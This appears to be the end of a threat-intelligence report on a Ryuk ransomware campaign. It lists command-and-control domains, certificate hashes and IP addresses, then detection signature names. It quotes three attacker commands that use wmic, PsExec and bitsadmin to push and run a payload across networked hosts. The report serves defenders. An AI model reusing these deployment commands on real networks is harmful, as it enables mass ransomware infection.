CN=topservicesecurity[.]net

b9375e7df4ee0f83d7abb179039dc2c5

3/1/20

207.148.21.17:80

CN=topserviceupdater[.]com

ece184f8a1309b781f912d4f4d65738e

3/1/20

108.61.90.90:443

CN=topservicesecurity[.]com

696aeb86d085e4f6032e0a01c496d26c

3/1/20

45.32.130.5:80

CN=avrenew[.]com

f32ee1bb35102e5d98af81946726ec1b

3/2/20

217.69.15.175:443

CN=serviceshelpers[.]com

9a437489c9b2c19c304d980c17d2e0e9

3/2/20

155.138.135.182:443

CN=topservicesupdates[.]com

b9deff0804244b52b14576eac260fd9f

3/2/20

95.179.210.8:80

CN=serviceuphelper[.]com

bb65efcead5b979baee5a25756e005d8

3/2/20

45.76.45.162:443

CN=boostsecuritys[.]com

7d316c63bdc4e981344e84a017ae0212

3/4/20

108.61.176.237:443

CN=yoursuperservice[.]com

7424aaede2f35259cf040f3e70d707be

3/4/20

207.246.67.70:443

CN=servicesecurity[.]org

d66cb5528d2610b39bc3cecc20198970

3/6/20

188.166.52.176:443

CN=top-servicebooster[.]com

f882c11b294a94494f75ded47f6f0ca0

3/7/20

149.248.56.113:443

CN=topservicehelper[.]com

2a29e359126ec5b746b1cc52354b4adf

3/8/20

199.247.13.144:443

CN=hakunamatatata[.]com

e2cd3c7e2900e2764da64a719096c0cb

3/8/20

95.179.210.8:443

CN=serviceuphelper[.]com

bb65efcead5b979baee5a25756e005d8

3/8/20

207.246.67.70:443

CN=servicesecurity[.]org

d89f6bdc59ed5a1ab3c1ecb53c6e571c

3/9/20

194.26.29.230:443

CN=secondserviceupdater[.]com

c30a4809c9a77cfc09314a63f7055bf7

3/9/20

194.26.29.229:443

CN=firstserviceupdater[.]com

bc86a3087f238014b6c3a09c2dc3df42

3/9/20

194.26.29.232:443

CN=fourthserviceupdater[.]com

3dc6d12c56cc79b0e3e8cd7b8a9c320b

3/9/20

194.26.29.234:443

CN=sixthserviceupdater[.]com

951e29ee8152c1e7f63e8ccb6b7031c1

3/9/20

194.26.29.235:443

CN=seventhserviceupdater[.]com

abe1ce0f83459a7fe9c72839fc46330b

3/9/20

194.26.29.236:443

CN=eighthserviceupdater[.]com

c7a539cffdd230a4ac9a4754c2c68f12

3/9/20

194.26.29.237:443

CN=ninethserviceupdater[.]com

1d1f7bf2c0eec7a3a0221fd473ddbafc

3/9/20

194.26.29.225:443

CN=seventeenthservicehelper[.]com

6b1e0621f4d891b8575a229384d0732d

3/9/20

194.26.29.227:443

CN=nineteenthservicehelper[.]com

38756ffb8f2962f6071e770637a2d962

3/9/20

194.26.29.242:443

CN=thirdservicehelper[.]com

3b911032d08ff4cb156c064bc272d935

3/9/20

194.26.29.244:443

CN=tenthservicehelper[.]com

a2d9b382fe32b0139197258e3e2925c4

3/9/20

194.26.29.226:443

CN=eighteenthservicehelper[.]com

4acbca8efccafd92da9006d0cc91b264

3/9/20

194.26.29.243:443

CN=ninthservicehelper[.]com

0760ab4a6ed9a124aabb8c377beead54

3/9/20

194.26.29.201:443

CN=secondservicehelper[.]com

d8a8d0ad9226e3c968c58b5d2324d899

3/9/20

194.26.29.202:443

CN=thirdservicehelper[.]com

0d3b79158ceee5b6ce859bb3fc501b02

3/9/20

194.26.29.220:443

CN=fourservicehelper[.]com

831e0445ea580091275b7020f2153b08

3/11/20

207.246.67.70:80

CN=servicesecurity[.]org

d89f6bdc59ed5a1ab3c1ecb53c6e571c

3/13/20

165.227.196.0:443

CN=twentiethservicehelper[.]com

977b4abc6307a9b3732229d4d8e2c277

3/14/20

45.141.86.91:443

CN=thirdservice-developer[.]com

edc2680e3797e11e93573e523bae7265

3/14/20

194.26.29.219:443

CN=firstservisehelper[.]com

6b444a2cd3e12d4c3feadec43a30c4d6

3/14/20

45.141.86.93:443

CN=fifthservice-developer[.]com

60e7500c809f12fe6be5681bd41a0eda

3/15/20

45.141.86.90:443

CN=secondservice-developer[.]com

de9460bd6b1badb7d8314a381d143906

3/15/20

45.141.86.84:443

CN=firstservice-developer[.]com

6385acd425e68e1d3fce3803f8ae06be

3/17/20

45.141.86.96:443

CN=eithtservice-developer[.]com

e1d1fb4a6f09fb54e09fb27167028303

3/17/20

45.141.86.92:443

CN=fourthservice-developer[.]com

5b5375bf30aedfa3a44d758fe42fccba

3/18/20

45.141.86.94:443

CN=sixthservice-developer[.]com

4d42bea1bfc7f1499e469e85cf75912c

3/18/20

108.61.209.121:443

CN=service-booster[.]com

692ed54fb1fb189c36d2f1674db47e45

3/18/20

134.122.116.114:443

CN=service-helpes[.]com

ad0914f72f1716d810e7bd8a67c12a71

3/18/20

209.97.130.197:443

CN=helpforyourservice[.]com

00fe3cc532f876c7505ddbf5625de404

3/18/20

192.241.143.121:443

CN=serviceshelps[.]com

e50998208071b4e5a70110b141542747

3/18/20

45.141.86.95:443

CN=seventhservice-developer[.]com

413ca4fa49c3eb6eef0a6cbc8cac2a71

3/18/20

198.211.116.199:443

CN=actionshunter[.]com

8e5bedbe832d374b565857cce294f061

3/18/20

45.141.86.155:443

CN=sexyservicee[.]com

cca37e58b23de9a1db9c3863fe2cd57c

3/19/20

194.26.29.239:443

CN=eleventhserviceupdater[.]com

7e0fcb78055f0eb12bc8417a6933068d

3/19/20

45.141.86.206:443

CN=servicedhunter[.]com

fdefb427dcf3f0257ddc53409ff71d22

3/19/20

45.141.86.92:443

CN=service-updateer[.]com

51ba9c03eac37751fe06b7539964e3de

3/19/20

134.122.116.59:443

CN=servicedbooster[.]com

db7797a20a5a491fb7ad0d4c84acd7e8

3/19/20

134.122.118.46:443

CN=servicedpower[.]com

7b57879bded28d0447eea28bacc79fb5

3/19/20

134.122.124.26:443

CN=serviceboostnumberone[.]com

880982d4781a1917649ce0bb6b0d9522

3/20/20

45.141.86.97:443

CN=ninethservice-developer[.]com

e4a720edfcc7467741c582cb039f20e0

3/20/20

178.62.247.205:443

CN=top-serviceupdater[.]com

a45522bd0a26e07ed18787c739179ccb

3/20/20

159.203.36.61:443

CN=yourserviceupdater[.]com

7b422c90dc85ce261c0a69ba70d8f6b5

3/20/20

134.122.20.117:443

CN=fifthserviceupdater[.]com

99aa16d7fc34cdcc7dfceab46e990f44

3/23/20

165.22.125.178:443

CN=servicemonsterr[.]com

82abfd5b55e14441997d47aee4201f6d

3/24/20

69.55.60.140:443

CN=boostyourservice[.]com

7f3787bf42f11da321461e6db7f295d1

3/24/20

45.141.86.98:443

CN=tenthservice-developer[.]com

eef29bcbcba1ce089a50aefbbb909203

3/26/20

178.79.132.82:443

CN=developmasters[.]com

5cf480eba910a625e5e52e879ac5aecb

3/26/20

194.26.29.247:443

CN=thirteenthservicehelper[.]com

2486df3869c16c0d9c23a83cd61620c2

5/4/20

159.65.216.127:443

CN=info-develop[.]com

5f7a5fb72c6689934cc5d9c9a681506b

9/22/20

69.61.38.155:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com

d37ba4a4b1885e96ff54d1f139bf3f47

9/22/20

96.9.225.144:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com

4408ba9d63917446b31a0330c613843d

9/22/20

96.9.209.216:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com

d921dd1ba03aaf37d5011020577e8147

9/22/20

107.173.58.176:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com

dfeb6959b62aff0b93ca20fd40ef01a8

9/22/20

96.9.225.143:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com

05c03b62dea6ec06006e57fd0a6ba22e

9/22/20

69.61.38.156:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com

c14a892f8203a04c7e3298edfc59363a

9/22/20

45.34.6.229:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com

7ed16732ec21fb3ec16dbb8df0aa2250

9/22/20

45.34.6.226:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com

1788068aff203fa9c51d85bf32048b9c

9/22/20

45.34.6.225:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com

0fff2f721ad23648175d081672e77df4

9/22/20

107.173.58.185:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com

b960355ba112136f93798bf85e6392bf

9/22/20

107.173.58.183:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com

a3d4e6d1f361d9c335effdbd33d12e79

9/22/20

107.173.58.175:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com

e13fbdff954f652f14faf11b735c0ef8

9/22/20

185.184.223.194:443

C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com

67310b30bada4f77f8f336438890d8f2

9/22/20

109.70.236.134:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com

ae74cbb9838688363b7928b06963c40a

9/23/20

64.44.131.103:443

C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net

af518cc031807f43d646dc508685bcd3

9/23/20

69.61.38.157:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com

c8fd81d6d3c8cbb8256c470a613a7c7b

9/23/20

193.142.58.129:443

C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com

5a22c3c8a0ed6482cad0e2b867c4c10c

9/23/20

45.34.6.223:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com

bf598ba46f47919c264514f10ce80e34

9/23/20

107.173.58.179:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com

1c8243e2787421373efcf98fc0975031

9/23/20

45.34.6.222:443

C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com

576d65a68900b270155c2015ac4788bb

9/23/20

107.173.58.180:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com

69643e9b1528efc6ec9037b60498b94c

9/23/20

107.173.58.182:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com

ca9b7e2fcfd35f19917184ad2f5e1ad3

9/23/20

45.34.6.221:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com

e5e0f017b00af6f020a28b101a136bad

9/24/20

213.252.244.62:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com

8367a1407ae999644f25f665320a3899

9/24/20

185.25.50.167:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com

34a78f1233e53010d29f2a4fa944c877

9/30/20

88.119.171.75:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com

eaebbe5a3e3ea1d5992a4dfd4af7a749

10/1/20

88.119.171.74:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com

adc8cd1285b7ae62045479ed39aa37f5

10/1/20

88.119.171.55:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com

bfe1fd16cd4169076f3fbaab5afcbe12

10/1/20

88.119.171.67:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com

c8a623eb355d172fc3e083763934a7f7

10/1/20

88.119.171.76:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com

0ac5659596008e64d4d0d90dfb6abe7c

10/1/20

88.119.171.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com

48003b6b638dc7e79e75a581c58f2d77

10/1/20

88.119.171.69:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com

5c75a6bbb7454a04b9ea26aa80dfbcba

10/1/20

88.119.171.73:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com

e391c997b757424d8b2399cba4733a60

10/1/20

88.119.171.77:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com

035697cac0ee92bb4d743470206bfe9a

10/1/20

88.119.171.78:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com

fc133bed713608f78f9f112ed7498f32

10/1/20

213.252.244.38:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com

8ead6021e2a5b9191577c115d4e68911

10/1/20

107.173.58.184:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com

1c9949d20441df2df09d13778b751b65

10/1/20

88.119.174.109:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com

c0ddfc954aa007885b467f8c4f70ad75

10/1/20

88.119.174.110:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com

ee63098506cb82fc71a4e85043d4763f

10/1/20

88.119.174.114:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com

422b020be24b346da826172e4a2cf1c1

10/1/20

88.119.174.116:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com

8d8f046e963bcd008fe4bbed01bed4c8

10/1/20

88.119.174.117:443

C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com

c381fb63e9cb6b0fc59dfaf6e8c40af3

10/1/20

88.119.174.118:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com

add6b742d0f992d56bede79888eef413

10/1/20

88.119.174.119:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com

9bbd073033e34bfd80f658f0264f6fae

10/1/20

88.119.174.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com

9afef617897e7089f59c19096b8436c8

10/1/20

88.119.174.120:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com

3f366e5f804515ff982c151a84f6a562

10/1/20

88.119.174.107:443

C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com

c2f99054e0b42363be915237cb4c950b

10/1/20

88.119.174.125:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com

4ac8ac12f1763277e35da08d8b9ea394

10/1/20

88.119.174.126:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com

7080547306dceb90d809cb9866ed033c

10/1/20

88.119.174.127:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com

03037dff61500d52a37efd4b4f520518

10/1/20

88.119.174.128:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com

959bed7a2662d7274b303f3b120fddea

10/1/20

213.252.244.126:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com

1d28556cc80df9627c20316358b625d6

10/1/20

213.252.244.170:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com

85e65803443046f921b9a0a9b8cc277c

10/1/20

213.252.246.154:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com

9df6ba82461aa0594ead03993c0e4c42

10/5/20

5.2.64.113:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com

18aadee1b82482c3cd5ebe32f3628f3f

10/7/20

5.2.79.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com

94bc44bd438d2e290516d111782badde

10/7/20

88.119.171.94:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com

f0ede92cb0899a9810a67d716cdbebe2

10/7/20

5.2.64.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com

e0f9efedd11d22a5a08ffb9c4c2cbb5a

10/7/20

5.2.64.135:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com

4aa2acabeb3ff38e39ed1d840124f108

10/7/20

5.2.72.202:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com

c04034b78012cca7dcc4a0fb5d7bb551

10/7/20

88.119.175.153:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com

2670bf08c43d995c74b4b83383af6a69

10/7/20

213.252.245.71:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com

127cc347b711610c3bcee434eb8bf822

10/7/20

213.252.246.144:443

C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com

b3e7ab478ffb0213017d57a88e7b2e3b

10/7/20

5.2.64.149:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com

188f603570e7fa81b92906af7af177dc

10/7/20

5.2.64.144:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com

22d7f35e624b7bcee7bb78ee85a7945c

10/7/20

88.119.174.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com

12c6e173fa3cc11cc6b09b01c5f71b0c

10/7/20

88.119.174.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com

28435684c76eb5f1c4b48b6bbc4b22af

10/7/20

88.119.175.214:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com

9c2d64cf4e8e58ef86d16e9f77873327

10/7/20

5.2.72.200:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com

f6f484baf1331abf55d06720de827190

10/7/20

5.2.79.10:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com

d8eacda158594331aec3ad5e42656e35

10/7/20

5.2.79.12:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com

29032dd12ea17fc37ffff1ee94cc5ba8

10/7/20

5.2.79.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com

eaf32b1c2e31e4e7b6d5c3e6ed6bff3d

10/7/20

5.2.64.174:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com

442680006c191692fcc3df64ec60d8fa

10/7/20

5.2.64.172:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com

0593cbf6b3a3736a17cd64170e02a78d

10/7/20

5.2.64.167:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com

38df81824bd8cded4a8fa7ad9e4d1f67

10/7/20

5.2.64.182:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com

99dbe71ca7b9d4a1d9f722c733b3f405

10/7/20

88.119.171.97:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com

7d7199ffa40c50b6e5b025b8cb2661b2

10/7/20

88.119.171.96:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com

f433d25a0dad0def0510cd9f95886fdb

10/7/20

96.9.209.217:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com

e84c7aa593233250efac903c19f3f589

10/7/20

69.61.38.132:443

C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com

e6e80f6eb5cbfc73cde40819007dcc53

10/13/20

45.147.230.131:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com

4fdeab3dad077589d52684d35a9ea4ab

10/13/20

45.147.229.92:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com

b70cdb49b26e6e9ba7d0c42d5f3ed3cb

10/13/20

45.147.229.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com

57024c1fe5c4acaf30434ba1f58f9144

10/13/20

45.147.229.52:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com

ec5496048f1962494d239d377e53db0c

10/13/20

45.147.229.44:443

C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com

938593ac1c8bdb2c5256540d7c8476c8

10/14/20

45.147.230.87:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com

cced46e0a9b6c382a97607beb95f68ab

10/14/20

45.147.230.159:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

e912980fc8e9ec1e570e209ebb163f65

10/14/20

45.147.230.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

39d7160ce331a157d3ecb2a9f8a66f12

10/14/20

45.147.230.140:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

d9ca73fe10d52eef6952325d102f0138

10/14/20

45.147.230.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

920d04330a165882c8076c07b00e1d93

10/14/20

45.147.230.132:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

771463611a43ee35a0ce0631ef244dee

10/14/20

45.147.229.180:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com

1e4a794da7d3c6d0677f7169fbe3b526

10/14/20

45.147.230.159:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

9c7fe10135f6ad96ded28fac51b79dfd

10/15/20

45.147.230.132:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

a78c0e2920e421667ae734d923dd5ca6

10/15/20

45.138.172.95:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com

a0b2378ceae498f46401aadeb278fb31

10/16/20

108.62.12.119:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com

e95bb7804e3add830496bd36664ed339

10/16/20

108.62.12.105:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com

8d5dc95b3bd4d16a3434b991a09bf77e

10/16/20

108.62.12.114:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com

d5de2f5d2ca29da1724735cdb8fbc63f

10/16/20

108.62.12.116:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com

9c7396ecd107ee8f8bf5521afabb0084

10/16/20

45.147.230.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

1134a6f276f4297a083fc2a605e24f70

10/16/20

45.147.230.140:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

2150045f476508f89d9a322561b28ff9

10/16/20

45.147.230.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

f4ddc4562e5001ac8fdf0b7de079b344

10/19/20

74.118.138.137:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

75fb6789ec03961c869b52336fa4e085

10/19/20

74.118.138.115:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

9f5e845091015b533b59fe5e8536a435

10/19/20

108.177.235.53:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

4b78eaa4f2748df27ebf6655ea8a7fe9

10/19/20

74.118.138.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

bcccda483753c82e62482c55bc743c16

10/21/20

45.153.241.1:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

672c66dd4bb62047bb836bd89d2e1a65

10/21/20

45.153.240.240:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

6825409698a326cc319ca40cd85a602e

10/21/20

45.153.240.194:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

7f9be0302da88e0d322e5701d52d4128

10/21/20

45.153.240.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

2c6a0856d1a75b303337ac0807429e88

10/21/20

45.153.240.136:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

6559dbf8c47383b7b493500d7ed76f6a

10/23/20

45.153.240.157:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

7bd044e0a6689ef29ce23e3ccb0736a3

10/23/20

45.153.240.178:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

9859a8336d097bc30e6e5c7a8279f18e

10/23/20

45.153.240.220:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

43fb2c153b59bf46cf6f67e0ddd6ef51

10/23/20

45.153.240.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

22bafb30cc3adaa84fef747d589ab235

10/23/20

45.153.241.134:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

31e87ba0c90bb38b986af297e4905e00

10/23/20

45.153.241.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

f8a14846b7da416b14303bced5a6418f

10/23/20

45.153.241.146:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

01abdaf870d859f9c1fd76f0b0328a2b

10/23/20

45.153.241.153:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

c2eaf144e21f3aef5fe4b1502d318ba6

10/23/20

45.153.241.158:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

de54af391602f3deea19cd5e1e912316

10/23/20

45.153.241.167:443

C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

5f6fa19ffe5735ff81b0e7981a864dc8

10/23/20

45.147.231.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

ff54a7e6f51a850ef1d744d06d8e6caa

10/23/20

45.153.241.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

4cda9d0bece4f6156a80967298455bd5

10/26/20

74.118.138.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

e317485d700bf5e8cb8eea1ec6a72a1a

10/26/20

108.62.12.12:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

e0022cbf0dd5aa597fee73e79d2b5023

10/26/20

108.62.12.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

44e7347a522b22cdf5de658a4237ce58

10/26/20

172.241.27.65:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

cd3e51ee538610879d6fa77fa281bc6f

10/26/20

172.241.27.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

04b6aec529b3656040a68e17afdabfa4

10/26/20

172.241.27.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

200c25c2b93203392e1acf5d975d6544

10/26/20

45.153.241.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

9d7c52c79f3825baf97d1318bae3ebe2

10/27/20

45.153.241.14:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

5bae28b0d0e969af2c0eda21abe91f35

10/28/20

190.211.254.154:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

a1e62e7e547532831d0dd07832f61f54

10/28/20

81.17.28.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

67c7c75d396988ba7d6cd36f35def3e4

10/28/20

81.17.28.105:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

880e59b44e7175e62d75128accedb221

10/28/20

179.43.160.205:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

cdea09a43bef7f1679e9cd1bbeb4b657

10/28/20

179.43.158.171:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

512c6e39bf03a4240f5a2d32ee710ce5

10/28/20

179.43.133.44:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

87f3698c743f8a1296babf9fbebafa9f

10/28/20

179.43.128.5:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

6df66077378c5943453b36bd3a1ed105

10/28/20

179.43.128.3:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

9706fd787a32a7e94915f91124de3ad3

10/28/20

81.17.28.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

0e1b0266de2b5eaf427f5915086b4d7c

RYUK Commands

start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Detecting the Techniques

FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

Endpoint Security

  • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
  • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
  • SINGLEMALT (DOWNLOADER)
  • STILLBOT (BACKDOOR)
  • WINEKEY (DOWNLOADER)
  • CORKBOT (BACKDOOR)
  • RYUK RANSOMWARE ENCRYPT COMMAND (FAMILY)
  • RYUK RANSOMWARE SETUP EXECUTION (FAMILY)
  • RYUK RANSOMWARE WAKE-ON-LAN EXECUTION (FAMILY)
  • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER TARGET (UTILITY)
  • RYUK RANSOMWARE ENCRYPTOR DISTRIBUTION SCRIPT CREATION (UTILITY)
  • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER SOURCE (UTILITY)

Network Security and Email Security

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
